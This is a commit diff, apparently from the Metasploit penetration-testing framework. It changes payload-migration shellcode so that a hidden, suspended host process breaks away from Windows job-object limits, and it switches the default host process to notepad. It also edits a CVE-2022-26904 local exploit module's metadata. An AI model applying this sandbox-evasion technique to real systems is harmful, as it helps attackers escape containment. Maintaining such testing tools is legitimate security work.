Add in updated Ruby code and also update the DLLs and prepend_migrate.rb to use the CREATE_BREAKAWAY_FROM_JOB flag with CreateProcess to break away from the job if the job has the JOB_OBJECT_LIMIT_BREAKAWAY_OK limit set to allow breakaway jobs

2022-03-23 17:47:25 -05:00 · 2022-03-23 17:47:25 -05:00 · b1ce05f97c
parent 715082a960
commit b1ce05f97c
4 changed files with 5 additions and 5 deletions
--- a/data/templates/template_x64_windows.dll
+++ b/data/templates/template_x64_windows.dll
--- a/data/templates/template_x86_windows.dll
+++ b/data/templates/template_x86_windows.dll
--- a/lib/msf/core/payload/windows/prepend_migrate.rb
+++ b/lib/msf/core/payload/windows/prepend_migrate.rb
@ -57,7 +57,7 @@ module Msf::Payload::Windows::PrependMigrate
  #
  def prepend_migrate(buf)
    payloadsize = "0x%04x" % buf.length
-    procname = datastore['PrependMigrateProc'] || 'rundll32'
+    procname = datastore['PrependMigrateProc'] || 'notepad'

    # Prepare instructions to get address of block_api into ebp
    block_api_start = <<-EOS
@ -221,7 +221,7 @@ module Msf::Payload::Windows::PrependMigrate
      xor ebx,ebx
      push ebx                  ; lpCurrentDirectory
      push ebx                  ; lpEnvironment
-      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
+      push 0x09000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
      push ebx                  ; bInHeritHandles
      push ebx                  ; lpThreadAttributes
      push ebx                  ; lpProcessAttributes
@ -300,7 +300,7 @@ module Msf::Payload::Windows::PrependMigrate

  def prepend_migrate_64(buf)
    payloadsize = "0x%04x" % buf.length
-    procname = datastore['PrependMigrateProc'] || 'rundll32'
+    procname = datastore['PrependMigrateProc'] || 'notepad'

    # Prepare instructions to get address of block_api into ebp
    block_api_start = <<-EOS
@ -467,7 +467,7 @@ module Msf::Payload::Windows::PrependMigrate
      xor rcx,rcx
      push rcx                  ; lpCurrentDirectory
      push rcx                  ; lpEnvironment
-      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
+      push 0x09000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
      push rcx                  ; bInHeritHandles
      mov r9, rcx               ; lpThreadAttributes
      mov r8, rcx               ; lpProcessAttributes
--- a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
+++ b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Local
            'Grant Willcox' # Metasploit module + Tweaks to PoC
          ],
          'Arch' => [ ARCH_X64 ],
-          'Platform' => 'windows',
+          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'Targets' => [
            [ 'Windows 11', { 'Arch' => ARCH_X64 } ]